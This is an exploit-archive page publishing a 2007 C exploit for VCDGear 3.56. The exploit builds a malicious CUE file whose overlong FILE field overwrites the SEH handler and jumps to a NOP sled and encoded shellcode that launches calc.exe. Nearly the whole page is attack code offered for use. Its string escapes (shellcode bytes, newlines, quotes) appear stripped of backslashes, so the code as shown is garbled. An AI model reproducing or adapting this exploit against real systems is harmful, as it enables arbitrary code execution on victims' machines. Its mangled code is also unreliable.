VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit
# Published : 2007-04-13
# Author : InTeL
# Previous Title : IrfanView 3.99 .ANI File Local Buffer Overflow Exploit (multiple targets)
# Next Title : TrueCrypt 4.3 Privilege Escalation Exploit (CVE-2007-1738)

/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
Discovered by: InTeL
Auther: InTeL
Attack Vector: SEH overwrite
Type: Local
Tested on Win2k SP4 (English)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: VCDGear v3.56 build 050213
Website: www.vcdgear.com
Description:

"VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG, 
correct MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has 
grown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow 
different machines to process and generate output that is compatible between one another. 

Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]

Greetz: erazerz, m03, devcode, #pen15
*/

#include <stdlib.h>
#include <stdio.h>

// Exec Calc.exe Scode
unsigned char scode[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x37x49x49x49x49x51x5ax6ax42"
"x58x50x30x41x31x42x41x6bx41x41x52x32x41x42x41x32"
"x42x41x30x42x41x58x50x38x41x42x75x38x69x79x6cx4a"
"x48x67x34x47x70x77x70x53x30x6ex6bx67x35x45x6cx4c"
"x4bx73x4cx74x45x31x68x54x41x68x6fx6cx4bx70x4fx57"
"x68x6ex6bx71x4fx45x70x65x51x5ax4bx67x39x4cx4bx50"
"x34x4cx4bx77x71x68x6ex75x61x4bx70x4ex79x6ex4cx4d"
"x54x4bx70x72x54x65x57x69x51x49x5ax46x6dx37x71x6f"
"x32x4ax4bx58x74x77x4bx41x44x44x64x35x54x72x55x7a"
"x45x6cx4bx53x6fx51x34x37x71x48x6bx51x76x4cx4bx76"
"x6cx50x4bx6ex6bx71x4fx67x6cx37x71x68x6bx4cx4bx65"
"x4cx4cx4bx64x41x58x6bx4bx39x53x6cx75x74x46x64x78"
"x43x74x71x49x50x30x64x6ex6bx43x70x44x70x4cx45x4f"
"x30x41x68x44x4cx4ex6bx63x70x44x4cx6ex6bx30x70x65"
"x4cx4ex4dx6cx4bx30x68x75x58x7ax4bx35x59x4cx4bx4d"
"x50x58x30x37x70x47x70x77x70x6cx4bx65x38x57x4cx31"
"x4fx66x51x48x76x65x30x70x56x4dx59x4ax58x6ex63x69"
"x50x31x6bx76x30x55x38x5ax50x4ex6ax36x64x63x6fx61"
"x78x6ax38x4bx4ex6cx4ax54x4ex76x37x6bx4fx4bx57x70"
"x63x51x71x32x4cx52x43x37x70x42";


int main(int argc, char *argv[])
{
	FILE *handle;

	if(argc < 2) {
		printf("0day VCDGear exploitn");
		printf("Usage: %s <output CUE file>", argv[0]);
		return 0;
	}

	if(!(handle = fopen(argv[1], "w"))) {
		printf("[+] Error");
		return 0;
	}

	fputs("FILE "", handle);
	for (int i=0;i<324;i++) 
		fputs("A", handle);
	
	fputs("xebx32x90x90", handle);
	fputs("x3ax1fx03x75", handle); //pop edi, pop esi, retn in ws2_32.dll (English / 	5.0.2195.6601)
	for (i=0;i<200;i++) 
		fputs("x90", handle);

	fputs((char *)scode, handle);
	fputs("" BINARYn", handle);
	fputs(" TRACK 01 MODE2/2352n", handle);
	fputs(" INDEX 01 00:00:00n", handle);
	
	fclose(handle);
	
	printf("[+] File successfully created");

	return 0;
}

// www.Syue.com [2007-04-13]